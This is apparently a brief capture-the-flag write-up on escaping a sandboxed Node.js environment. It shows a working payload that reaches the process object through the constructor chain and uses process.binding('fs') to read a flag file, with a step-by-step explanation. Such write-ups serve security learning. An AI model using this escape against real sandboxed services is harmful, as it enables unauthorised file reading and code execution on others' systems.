Last updated
Last updated
Sandboxed NodeJS environment
We figured out we could use this.constructor.constructor("return this.process")() to run more arbritrary JS, but the require function was disabled.
However, we could use this.process.bindings to import the original C++ functions. With some reference to and the node JS source code, I came up with:
this.constructor.constructor("b = Buffer.allocUnsafe(8192);this.process.binding('fs').read(this.process.binding('fs').open('/ctf/flag.txt', 0, 0600, 0, 0), b, 0, 4096, 0, 0, 0); return b")().toString()
Define a buffer of size 8192
Call read() on a file descriptor provided by open('/ctf/flag.txt') in readonly, and read that into the buffer, then return
The zeros are where the docs specified 'undefined' and 'ctf' and luckily this didn't matter. We get the flag(and a bunch of junk)